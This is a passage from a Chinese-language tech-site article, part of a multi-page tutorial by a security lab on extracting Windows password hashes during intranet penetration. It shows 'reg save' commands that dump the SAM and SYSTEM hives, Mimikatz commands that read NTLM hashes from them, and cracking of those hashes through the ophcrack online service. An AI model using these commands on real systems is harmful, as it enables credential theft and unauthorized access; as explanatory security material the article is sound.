侵权投诉
订阅
纠错
加入自媒体

内网渗透:获取Windows内Hash密码的方法总结

2020-08-21 16:02
美创科技
关注

3、通过SAM和System文件抓取密码和Hash

首先利用注册表命令将目标机的sam或者system文件导出

reg save hklmsam sam.hive

reg save hklmsystem system.hive


美创安全实验室 | 内网渗透—获取Windows内Hash密码方法总结


然后将目标机上的sam.hive和system.hive下载到本地,利用Mimikatz读取sam和system文件获取NTLMHash:

token::elevate

lsadump::sam


美创安全实验室 | 内网渗透—获取Windows内Hash密码方法总结



美创安全实验室 | 内网渗透—获取Windows内Hash密码方法总结


Windows密码破解方法

1、ophcrack在线破解

再通过以上工具获取到密码Hash后,我们需要对其进行破解,以得到明文密码。Ophcrack网站https://www.objectif-securite.ch/en/ophcrack提供了在线Hash破解服务,我们将得到的NTLM Hash输入到第一个查询框内,点击GO即可进行破解,小于14位的密码一般在几分钟内就可以破解完成:


美创安全实验室 | 内网渗透—获取Windows内Hash密码方法总结


图2:ophcrack在线破解

<上一页  1  2  3  4  下一页>  
声明: 本文由入驻维科号的作者撰写,观点仅代表作者本人,不代表OFweek立场。如有侵权或其他问题,请联系举报。

发表评论

0条评论,0人参与

请输入评论内容...

请输入评论/评论长度6~500个字

您提交的评论过于频繁,请输入验证码继续

暂无评论

暂无评论

    电子工程 猎头职位 更多
    扫码关注公众号
    OFweek电子工程网
    获取更多精彩内容
    文章纠错
    x
    *文字标题:
    *纠错内容:
    联系邮箱:
    *验 证 码:

    粤公网安备 44030502002758号